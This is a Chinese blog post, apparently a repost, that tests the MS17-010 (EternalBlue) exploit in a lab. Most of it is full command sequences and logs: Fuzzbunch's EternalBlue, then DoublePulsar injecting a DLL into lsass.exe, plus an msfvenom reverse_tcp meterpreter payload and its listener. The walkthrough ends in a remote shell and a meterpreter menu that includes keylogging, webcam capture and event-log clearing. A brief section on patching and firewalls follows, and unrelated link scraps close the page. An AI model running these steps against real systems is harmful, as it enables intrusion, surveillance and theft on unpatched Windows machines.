方式程0day MS17-010远程溢出漏洞测试
2024-05-25 19:18:47
最近那个WannaCry勒索病毒搞的沸沸扬扬,据了解该病毒利用了方程式泄露的0day MS17-010(永恒之蓝)进行传播。
据说这个漏洞是支持winxp-win2012,测试一下这个漏洞到底如何。
一、环境:
靶机:win7 IP:192.168.4.247
攻击机:win2003 IP:192.168.4.16
反弹shell: kali IP:192.168.4.15
在攻击机中需要python2.6环境和安装pywin32
python-2.6.6.msi
https://www.python.org/download/releases/2.6.6/
pywin32-221.win-amd64-py2.6.exe
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
二、配置攻击机
先可以用nmap扫一下内网里开放445端口和操作系统信息
nmap -p 445 -O 192.168.4.0/24
---------------------------------------------------------------
下载工具之后解压,然后在工具里面的windows目录建一个listeningposts
打开cmd工具的windows目录,运行fb.py
--[ Version 3.5.1[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ONImplantConfig Autorun List
==========================0) prompt confirm1) executeExploit Autorun List
====================0) apply1) touch all2) prompt confirm3) executeSpecial Autorun List
====================0) apply1) touch all2) prompt confirm3) executePayload Autorun List
====================0) apply1) prompt confirm2) execute[+] Set FbStorage => E:\shadowbroker-master\shadowbroker-master\windows\storage[*] Retargetting Session[?] Default Target IP Address [] : 192.168.4.247
[?] Default Callback IP Address [] : 192.168.4.16
[?] Use Redirection [yes] : no[?] Base Log directory [D:\logs] : no
[*] Checking E:\shadowbroker-master\shadowbroker-master\windows\no for projects
Index Project
----- -------
0 test
1 test2
2 test3
3 test4
4 test5
5 Create a New Project[?] Project [0] : 5
[?] New Project Name : test6
[?] Set target log directory to 'E:\shadowbroker-master\shadowbroker-master\wind
ows\no\test6\z192.168.4.247'? [Yes] :[*] Initializing Global State
[+] Set TargetIp => 192.168.4.247
[+] Set CallbackIp => 192.168.4.16[!] Redirection OFF
[+] Set LogDir => E:\shadowbroker-master\shadowbroker-master\windows\no\test6\z1
92.168.4.247
[+] Set Project => test6fb >--------------------------------------------
在这里我们使用Eternalblue(ms17-010 永恒之蓝)
fb > use Eternalblue[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.4.247[*] Applying Session Parameters
[*] Running Exploit Touches[!] Enter Prompt Mode :: EternalblueModule: Eternalblue
===================Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.4.247
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.[?] NetworkTimeout [60] :[*] TargetIp :: Target IP Address[?] TargetIp [192.168.4.247] :[*] TargetPort :: Port used by the SMB service for exploit connection[?] TargetPort [445] :[*] VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.[?] VerifyTarget [True] :[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.[?] VerifyBackdoor [True] :[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.[?] MaxExploitAttempts [3] :[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.[?] GroomAllocations [12] :[*] Target :: Operating System, Service Pack, and Architecture of target OS0) XP Windows XP 32-Bit All Service Packs*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs[?] Target [1] : 1[!] Preparing to Execute Eternalblue[*] Mode :: Delivery mechanism*0) DANE Forward deployment via DARINGNEOPHYTE1) FB Traditional deployment from within FUZZBUNCH[?] Mode [0] : 1
[+] Run Mode: FB[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] :
[*] Redirection OFF[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.4.247] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.4.247:445[+] Configure Plugin Remote TunnelsModule: Eternalblue
===================Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.4.247
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2[?] Execute Plugin? [Yes] :----------------------------------
回车就开始攻击
[*] Executing Plugin
[*] Connecting to target for exploitation.[+] Connection established for exploitation.
[*] Pinging backdoor...[+] Backdoor returned code: 10 - Success![+] Ping returned Target architecture: x64 (64-bit)[+] Backdoor is already installed -- nothing to be done.
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 01 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeededfb Special (Eternalblue) >----------------------------------
漏洞已经触发成功,接着我们配置让它加载dll反弹shell回kail
fb Special (Eternalblue) > use doublepulsar[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.4.247[*] Applying Session Parameters[!] Enter Prompt Mode :: DoublepulsarModule: Doublepulsar
====================Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.4.247
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1
for no timeout.[?] NetworkTimeout [60] :[*] TargetIp :: Target IP Address[?] TargetIp [192.168.4.247] :[*] TargetPort :: Port used by the Double Pulsar back door[?] TargetPort [445] :[*] Protocol :: Protocol for the backdoor to speak*0) SMB Ring 0 SMB (TCP 445) backdoor1) RDP Ring 0 RDP (TCP 3389) backdoor[?] Protocol [0] :[*] Architecture :: Architecture of the target OS*0) x86 x86 32-bits1) x64 x64 64-bits[?] Architecture [0] : 1
[+] Set Architecture => x64[*] Function :: Operation for backdoor to perform*0) OutputInstall Only output the install shellcode to a binary file on d
isk.1) Ping Test for presence of backdoor2) RunDLL Use an APC to inject a DLL into a user mode process.3) RunShellcode Run raw shellcode4) Uninstall Remove's backdoor from system[?] Function [0] : 2
[+] Set Function => RunDLL[*] DllPayload :: DLL to inject into user mode[?] DllPayload [] : -------------------------------------
到这里需要配置一个反弹shell的dll, 去kali上生成dll放到C:\backdoor.dll, 配置监听端。
三、配置反弹shell
在kali上生成dll, 放到攻击机win2003的C:\backdoor.dll上。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.20.89.101 LPORT=5555 -f dll > backdoor.dll打开msf控制台,配置监听端
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.4.15
lhost => 192.168.4.15
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit
---------------------------------
四、大功告成
到回到攻击机win2003上接着配置
[?] DllPayload [] : C:\\backdoor.dll
[-] Error: Invalid value for 'DllPayload' (C:\\backdoor.dll)[*] DllPayload :: DLL to inject into user mode[?] DllPayload [] :[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call[?] DllOrdinal [1] :[*] ProcessName :: Name of process to inject into[?] ProcessName [lsass.exe] :[*] ProcessCommandLine :: Command line of process to inject into[?] ProcessCommandLine [] :[!] Preparing to Execute Doublepulsar
[*] Redirection OFF[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.4.247] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.4.247:445[+] Configure Plugin Remote TunnelsModule: Doublepulsar
====================Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.4.247
TargetPort 445
DllPayload .
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...[+] Backdoor returned code: 10 - Success![+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x3B05856
0SMB Connection string is: Windows 7 Ultimate 7601 Service Pack 1Target OS is: 7 x64Target SP is: 1[+] Backdoor installed[+] DLL built[.] Sending shellcode to inject DLL[+] Backdoor returned code: 10 - Success![+] Backdoor returned code: 10 - Success![+] Backdoor returned code: 10 - Success![+] Command completed successfully
[+] Doublepulsar Succeeded
到此大功告成,到Kali上看看,shell是不是返回了。
---------------------------------------------------
[*] Started reverse handler on 192.168.4.15:5555
[*] Starting the payload handler...
[*] Sending stage (1105970 bytes) to 192.168.4.247
[*] Meterpreter session 1 opened (192.168.4.15:5555 -> 192.168.4.247:49289) at 2017-06-03 01:36:08 +0800meterpreter > sysinfo
Computer : HE-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/win64
-------------------------------------------------
meterpreter的功能很强大,可以help看一下
meterpreter > helpCore Commands
=============Command Description------- -----------? Help menubackground Backgrounds the current sessionbgkill Kills a background meterpreter scriptbglist Lists running background scriptsbgrun Executes a meterpreter script as a background threadchannel Displays information about active channelsclose Closes a channeldisable_unicode_encoding Disables encoding of unicode stringsenable_unicode_encoding Enables encoding of unicode stringsexit Terminate the meterpreter sessionget_timeouts Get the current session timeout valueshelp Help menuinfo Displays information about a Post moduleinteract Interacts with a channelirb Drop into irb scripting modeload Load one or more meterpreter extensionsmachine_id Get the MSF ID of the machine attached to the sessionmigrate Migrate the server to another processquit Terminate the meterpreter sessionread Reads data from a channelresource Run the commands stored in a filerun Executes a meterpreter script or Post moduleset_timeouts Set the current session timeout valuessleep Force Meterpreter to go quiet, then re-establish session.transport Change the current transport mechanismuse Deprecated alias for 'load'uuid Get the UUID for the current sessionwrite Writes data to a channelStdapi: File system Commands
============================Command Description------- -----------cat Read the contents of a file to the screencd Change directorydownload Download a file or directoryedit Edit a filegetlwd Print local working directorygetwd Print working directorylcd Change local working directorylpwd Print local working directoryls List filesmkdir Make directorymv Move source to destinationpwd Print working directoryrm Delete the specified filermdir Remove directorysearch Search for filesupload Upload a file or directoryStdapi: Networking Commands
===========================Command Description------- -----------arp Display the host ARP cachegetproxy Display the current proxy configurationifconfig Display interfacesipconfig Display interfacesnetstat Display the network connectionsportfwd Forward a local port to a remote serviceroute View and modify the routing tableStdapi: System Commands
=======================Command Description------- -----------clearev Clear the event logdrop_token Relinquishes any active impersonation token.execute Execute a commandgetenv Get one or more environment variable valuesgetpid Get the current process identifiergetprivs Attempt to enable all privileges available to the current processgetsid Get the SID of the user that the server is running asgetuid Get the user that the server is running askill Terminate a processps List running processesreboot Reboots the remote computerreg Modify and interact with the remote registryrev2self Calls RevertToSelf() on the remote machineshell Drop into a system command shellshutdown Shuts down the remote computersteal_token Attempts to steal an impersonation token from the target processsuspend Suspends or resumes a list of processessysinfo Gets information about the remote system, such as OSStdapi: User interface Commands
===============================Command Description------- -----------enumdesktops List all accessible desktops and window stationsgetdesktop Get the current meterpreter desktopidletime Returns the number of seconds the remote user has been idlekeyscan_dump Dump the keystroke bufferkeyscan_start Start capturing keystrokeskeyscan_stop Stop capturing keystrokesscreenshot Grab a screenshot of the interactive desktopsetdesktop Change the meterpreters current desktopuictl Control some of the user interface componentsStdapi: Webcam Commands
=======================Command Description------- -----------record_mic Record audio from the default microphone for X secondswebcam_chat Start a video chatwebcam_list List webcamswebcam_snap Take a snapshot from the specified webcamwebcam_stream Play a video stream from the specified webcam--------------------------------------------------
执行screenshot截屏
meterpreter > screenshot
Screenshot saved to: /root/eeEcyUfp.jpeg
执行shell就会得到cmd命令行
meterpreter > shell
Process 2880 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Windows\system32>net user
-------------------------------------------------------------------------------
Administrator Guest testuser
命令成功完成。
--------------
输入exit退出windows的命令行,回到meterpreter
C:\Windows\system32>exit
exit
meterpreter >
-------------------------------------------------
五、防范ms17-010
最好的方法就是把补丁给打上,就搞不了。以下是在有补丁的机器上测试的效果:
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.[+] Connection established for exploitation.
[*] Pinging backdoor...[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (39 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
0x00000020 50 61 63 6b 20 31 00 Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming[+] Sending SMBv2 buffers.............DONE.[+] Sending large SMBv1 buffer..DONE.[+] Sending final SMBv2 buffers......DONE.[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!DONE.
[*] Receiving response from exploit packet
[-] No response received from exploit packet. Not good.
[+] CORE terminated with status code 0xdf5d0013
[-] Error getting output back from Core; aborting...
[!] Plugin failed
[-] Error: Eternalblue Failed
还有一个简单的方法就是把Windows自带的防火墙打开,这样445端口就不通了,漏洞也就没法搞了,以下是测试的效果:
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
[-] Error connecting to target
[+] CORE terminated with status code 0xdf5d000b
[-] Error getting output back from Core; aborting...
[!] Plugin failed
[-] Error: Eternalblue Failed
原文地址:https://www.exchen.net/%E6%96%B9%E5%BC%8F%E7%A8%8B-0day-ms17-010-%E8%BF%9C%E7%A8%8B%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95.html
方式程0day MS17-010远程溢出漏洞测试相关推荐
- c++ c6386 缓冲区 溢出_Office 远程溢出漏洞测试与分析
本文作者:ghostkeeper(信安之路首次投稿作者) 获得奖励:加入信安之路核心群+免费邀请加入信安之路知识星球+免费获取 90sec 论坛邀请码 在 2017 年 11 月,微软发布的 11 月 ...
- 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...
- 利用MS08067远程溢出漏洞抓肉鸡
利用MS08067远程溢出漏洞抓肉鸡 陈小兵 [antian365.com] 微软的正版验证机会出来以后没有多久,就爆出针对台湾和简体中文版本的MS08067漏洞,这个时候微软主动爆出这个号称比冲击波 ...
- 一步到位的 UPnP 远程溢出漏洞实战
远程溢出***漏洞 (Remote Buffer Overflow Vulnerability) 是远程直接***被黑 电脑或服务器最典型.最常见的漏洞,原因无它,只要溢出成功并运行 ShellCod ...
- linux远程溢出,Linux netkit in.telnetd远程溢出漏洞
Linux netkit in.telnetd远程溢出漏洞 2008-04-09 04:30:32来源:互联网 阅读 () Linux netkit in.telnetd远程溢出漏洞 发布日期:200 ...
- 网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)
一.漏洞原理简介 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时, ...
- CVE-2018-4407 苹果设备远程溢出漏洞
2018-10-30 公开了一个 Apple 设备的远程代码执行漏洞 CVE-2018-4407,该漏洞是收到畸形数据包后,向发送方报告错误,在构造 ICMP 数据包时发生了溢出,影响 macOS 1 ...
- ms08-067漏洞 远程溢出入侵测试
被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English 攻击者IP地址:192.168.9.1 //查看数据库连接状态 msf > db_status [ ...
- 方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记
0x01 环境搭建 win2003 攻击机,ip:192.168.0.28 kali 攻击机,ip:192.168.0.27 win7 靶机,ip:192.168.0.14:netstat -an ...
最新文章
- C语言实现十大经典排序算法
- arcpy实现空间查询_布隆过滤!Python实现亿级数据集中元素快速查找
- foxmail 服务器备份 立刻删除_PC整机备份与还原教程 Active Backup for Business
- OpenSSL--Window生成证书实战
- AppDelegate.h
- 字符串反转python_Python实现字符串反转的几种方法
- 小技巧之nvidia-smi
- 高效编排有状态应用——TiDB 的云原生实践与思考
- 华为回怼特朗普;中兴首款 5G 上市;iPhone 可免息分期购买 | 极客头条
- Redis更新数据的时候如何不重置过期时间
- html5播放 h.264裸流,[转载]成功在MP4封装的H264视频中提取能播放的裸流
- 大数据舆情监测平台_大数据舆情监测与分析平台有哪些?舆情大数据监测软件排名2020...
- vue.js开发微信公众号加载缓慢出现的白页问题-随笔
- docker MySQL 双主_DockerMysql数据库实现双主同步配置详细·TesterHome
- 工程数学 | 两种中值定理傻傻分不清
- 华为wifi信号如何连接到服务器,如何解决华为路由器搜到信号却无法连接
- 并发编程的艺术 读书笔记
- stm32f105vct6例程_STM32F105VCT6_USB_TEST
- L1-030 一帮一
- nexus搭建npm私服